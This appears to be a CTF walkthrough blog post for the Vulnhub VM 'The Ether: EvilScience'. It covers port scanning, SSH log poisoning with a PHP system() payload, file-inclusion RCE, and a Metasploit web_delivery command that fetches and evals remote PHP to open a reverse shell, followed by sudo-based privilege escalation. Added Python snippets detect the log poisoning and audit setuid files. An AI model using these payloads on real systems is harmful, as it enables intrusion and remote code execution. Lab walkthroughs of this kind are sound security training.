Amonsec

The Ether: CTF walkthrough

Introduction

Name: The Ether: EvilScience
Release date: 26 Oct 2017

Author: f1re_w1re
Series: The Ether
Web page: https://securityshards.wordpress.com/2017/10/26/the-ether-a-new-boot-2-root-hacking-challenge/

Note: the VM from Vulnhub has an issue. Download the VM from this updated link (on the author's website) instead: here


Recognition

We use arp-scan to find the IP address of the VM.

[Image: arp-scan output]

Then, we scan the VM for open ports and running services.

root@kali:~# nmap -A -F 192.168.1.54

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-26 13:04 CET
Nmap scan report for theether-1.home (192.168.1.54)
Host is up (0.00074s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 00:0C:29:44:E7:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms theether-1.home (192.168.1.54)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds
root@kali:~#

Remote commands execution

After a few scans and some research with the OWASP ZAP tool, I found that we are able to read the content of the auth.log file, where SSH connection attempts are logged.

[Image: OWASP ZAP showing the local file inclusion]

We can poison this log file with the following connection attempt.

root@kali:~# ssh '<?php echo system($_GET['c']);?>'@192.168.1.54
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
<?php echo system($_GET[c]);?>@192.168.1.54: Permission denied (publickey,password).
root@kali:~#

Then, to check whether we have an RCE, we can send this request.

root@kali:~# curl 'http://192.168.1.54/index.php?file=/var/log/auth.log&c=ls' -s | head

Nov 26 05:04:53 theEther sshd[2024]: Invalid user about.php
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py
xxxlogauditorxxx.py from 192.168.1.104
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user about.php
(23) Failed writing body
root@kali:~#
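As an added detection example (not part of the walkthrough), the Python below flags auth.log entries whose username field carries a PHP open tag, which is the trace the poisoning step above leaves in the log. The sample log lines are constructed to match the sshd format shown in the curl output.

```python
import re

# Constructed sample auth.log excerpt, modelled on the lines the walkthrough
# shows: sshd records the attempted username verbatim in both record types.
SAMPLE_AUTH_LOG = """\
Nov 26 05:03:10 theEther sshd[2001]: Invalid user admin from 192.168.1.104
Nov 26 05:04:53 theEther sshd[2024]: Invalid user <?php echo system($_GET[c]);?> from 192.168.1.104
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user <?php echo system($_GET[c]);?>
Nov 26 05:05:00 theEther sshd[2030]: Accepted password for evilscience from 192.168.1.10 port 51234 ssh2
"""

# Extract the username (and source IP when present) from the two sshd
# "invalid user" record types.  The username is attacker-controlled.
INVALID_USER_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|input_userauth_request: invalid user) "
    r"(?P<user>.*?)(?: from (?P<ip>\S+))?$"
)

# A PHP open tag (full, short or echo form) is never a legitimate username;
# its presence means the log is being seeded for a later file inclusion.
PHP_TAG_RE = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)


def find_poisoned_entries(log_text):
    """Return (line_no, username, source_ip) for each entry whose username
    contains a PHP tag.  source_ip is None for record types without it."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = INVALID_USER_RE.search(line)
        if m and PHP_TAG_RE.search(m.group("user")):
            hits.append((line_no, m.group("user"), m.group("ip")))
    return hits


if __name__ == "__main__":
    for line_no, user, ip in find_poisoned_entries(SAMPLE_AUTH_LOG):
        print("line %d: PHP tag in username %r from %s" % (line_no, user, ip))
```

The alert is only a symptom; the fix is in index.php, which should map the file parameter onto an allowlist of page names rather than include an arbitrary path.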

From RCE to reverse shell

For this CTF I will use the web_delivery exploit from the Metasploit Framework.

root@kali:~# msfconsole -q -x 'use exploit/multi/script/web_delivery'
msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf exploit(web_delivery) >

I changed the SRVPORT (the default 8080 is used by OWASP ZAP), the PAYLOAD (PHP instead of Python), the LHOST and the TARGET (for a PHP payload) parameters.

msf exploit(web_delivery) > set TARGET 1
TARGET => 1
msf exploit(web_delivery) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf exploit(web_delivery) > set SRVPORT 9090
SRVPORT => 9090
msf exploit(web_delivery) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.104:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:9090/DBoQOU8UZc3Qfb
[*] Local IP: http://192.168.1.104:9090/DBoQOU8UZc3Qfb
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.104:9090/DBoQOU8UZc3Qfb'));"

msf exploit(web_delivery) >

Finally, we execute the PHP command to gain a reverse shell.

root@kali:~# python 
Python 2.7.14 (default, Sep 17 2017, 18:50:44) 
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> url = '''http://192.168.1.54/index.php?file=/var/log/auth.log&c=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.104:9090/DBoQOU8UZc3Qfb'));"'''
>>> resp = requests.get(url)

Let's get a TTY with low privileges.

[Image: low-privilege shell]

Privilege escalation

A weird Python script can be found in the /var/www/html/theEther.com/public_html directory.

bash-4.3$ ls -la
ls -la
total 11312
drwxrwxr-x 4 root www-data        4096 Nov 23 19:44 .
drwxr-xr-x 5 root root            4096 Oct 23 18:31 ..
-rwxrwxr-x 1 root www-data        5891 Oct 23 19:27 about.php
drwxrwxr-x 3 root www-data        4096 Oct 23 18:02 images
-rwxrwxr-x 1 root www-data        6495 Oct 23 20:48 index.php
drwxrwxr-x 4 root www-data        4096 Oct 23 18:02 layout
-rwxrwxr-x 1 root www-data        5006 Oct 23 18:02 licence.txt
-rwxrwxr-x 1 root www-data       10641 Oct 23 19:26 research.php
-rwsrwsr-x 1 root evilscience 11527272 Nov 23 19:41 xxxlogauditorxxx.py
bash-4.3$

Moreover, we can execute this script with root privileges without a password.

[Image: sudo vulnerability]

Plus, this script executes the cat command, so we are able to run any command we want with root privileges.

[Image: exploit proof of concept]

We upload and execute a reverse shell on the system.

[Image: root shell]

We read the flag hidden in a PNG file.

[Image: the flag]

Finally, we decode the base64 flag.

[Image: decoded flag]
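As an added audit example (not the walkthrough's or the VM author's code), the Python below walks a directory and reports files with the shape of the listing above: a setuid/setgid executable that its group can rewrite, and a setuid bit on an interpreted script. The demo tree is constructed in a temporary directory, so its files are owned by the current user rather than root; the root-owned check is included for real use.

```python
import os
import stat
import tempfile


def audit_file(path):
    """Return the list of privilege-escalation findings for one regular file."""
    mode = os.lstat(path).st_mode
    if not stat.S_ISREG(mode):
        return []
    findings = []
    privileged = bool(mode & (stat.S_ISUID | stat.S_ISGID))
    if mode & stat.S_ISUID:
        findings.append("setuid")
    if mode & stat.S_ISGID:
        findings.append("setgid")
    if privileged and os.lstat(path).st_uid == 0:
        findings.append("root-owned")
    # A group- or world-writable privileged file lets that group replace
    # the code that will run with elevated rights (rwsrwsr-x in the listing).
    if privileged and mode & stat.S_IWGRP:
        findings.append("group-writable")
    if privileged and mode & stat.S_IWOTH:
        findings.append("world-writable")
    # Linux ignores setuid/setgid on #! scripts, so the bit on a .py file
    # is a misconfiguration marker; the real risk is a sudo rule for it.
    if privileged and path.endswith(".py"):
        findings.append("setuid-on-interpreted-script")
    return findings


def audit_tree(root):
    """Map each flagged file (relative to root) to its findings."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            findings = audit_file(full)
            if findings:
                results[os.path.relpath(full, root)] = findings
    return results


def run_demo():
    """Build a constructed fixture mirroring the listing and audit it."""
    root = tempfile.mkdtemp(prefix="ether_audit_")
    for name, mode in (("index.php", 0o775), ("xxxlogauditorxxx.py", 0o6775)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("#!/usr/bin/env python\n")
        os.chmod(path, mode)  # 0o6775 == rwsrwsr-x, as in the listing
    return audit_tree(root)


if __name__ == "__main__":
    for rel, findings in sorted(run_demo().items()):
        print("%s: %s" % (rel, ", ".join(findings)))
```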